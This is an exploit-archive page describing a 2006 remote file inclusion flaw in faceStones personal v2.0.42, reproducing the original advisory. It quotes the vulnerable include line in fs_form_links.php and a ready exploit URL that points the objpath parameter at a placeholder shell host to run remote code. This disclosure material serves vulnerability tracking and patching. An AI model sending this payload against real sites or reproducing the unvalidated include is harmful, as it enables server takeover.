header-logo
Suggest Exploit
vendor:
facestones_personal
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: facestones_personal
Affected Version From: v2.0.42
Affected Version To: v2.0.42
Patch Exists: Yes
Related CWE: N/A
CPE: a:facestones:facestones_personal
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

faceStones personal <= v2.0.42 (objpath) Remote File Inclusion Exploit

A vulnerability exists in faceStones personal version v2.0.42, due to improper validation of user-supplied input in the 'objpath' parameter of the 'fs_form_links.php' script. An attacker can exploit this vulnerability to include arbitrary remote files, leading to arbitrary code execution on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of faceStones personal.
Source

Exploit-DB raw data:

#==============================================================================================
#faceStones personal <= v2.0.42 (objpath) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://www.facestones.de/fshtml/service/download/index.php
#                                                                      
#Version : v2.0.42                                            
#                                                        
#================================================================================================
#Bug in : fsl2/objects/fs_form_links.php
#
#Vlu Code :
#--------------------------------
#
#            include($GLOBALS['fsinit']['objpath'] . '/fs_display_indextab.php');
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/fsl2/objects/fs_form_links.php?GLOBALS[fsinit][objpath]=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & XoRoN & Timq & Simoo & Saudi HAckerz
==================================================================================================

# milw0rm.com [2006-09-25]